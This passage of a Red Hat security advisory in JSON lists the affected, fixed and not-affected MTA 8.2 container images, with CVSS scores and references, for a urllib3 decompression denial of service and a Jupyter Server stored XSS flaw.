"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in urllib3, an HTTP client library for Python. This vulnerability allows a remote attacker to cause excessive resource consumption, such as high CPU usage and massive memory allocation, on the client side. This occurs when urllib3 attempts to decompress an entire HTTP response, even if only a partial read was requested, or when draining the connection after a partial decompression. This can lead to a Denial of Service (DoS) condition.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "urllib3: urllib3: Denial of Service due to excessive HTTP response decompression",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44432"
},
{
"category": "external",
"summary": "RHBZ#2477154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44432",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44432"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44432",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44432"
},
{
"category": "external",
"summary": "https://github.com/urllib3/urllib3/security/advisories/GHSA-mf9v-mfxr-j63j",
"url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-mf9v-mfxr-j63j"
}
],
"release_date": "2026-05-13T15:17:12.611000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "urllib3: urllib3: Denial of Service due to excessive HTTP response decompression"
},
{
"cve": "CVE-2026-44727",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2026-06-22T21:00:50.127940+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2491516"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Jupyter Server. The nbconvert HTTP handlers in Jupyter Server render user-authored notebook HTML without a sandbox directive in their Content-Security-Policy. This, combined with nbconvert.HTMLExporter\u0027s default non-sanitizing behavior, allows a notebook containing an HTML payload to trigger a stored Cross-Site Scripting (XSS) vulnerability. A remote attacker could exploit this to gain cookie access, full API authority, and achieve kernel Remote Code Execution (RCE).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jupyter-server: Jupyter Server: Remote Code Execution via stored Cross-Site Scripting in nbconvert handlers",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44727"
},
{
"category": "external",
"summary": "RHBZ#2491516",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2491516"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44727",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44727"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44727",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44727"
},
{
"category": "external",
"summary": "https://github.com/jupyter-server/jupyter_server/commit/6cbee8d65e71abac851c4492fea987ad080580bd",
"url": "https://github.com/jupyter-server/jupyter_server/commit/6cbee8d65e71abac851c4492fea987ad080580bd"
},
{
"category": "external",
"summary": "https://github.com/jupyter-server/jupyter_server/security/advisories/GHSA-fcw5-x6j4-ccmp",
"url": "https://github.com/jupyter-server/jupyter_server/security/advisories/GHSA-fcw5-x6j4-ccmp"
}
],
"release_date": "2026-06-22T19:56:56.776000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.0,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
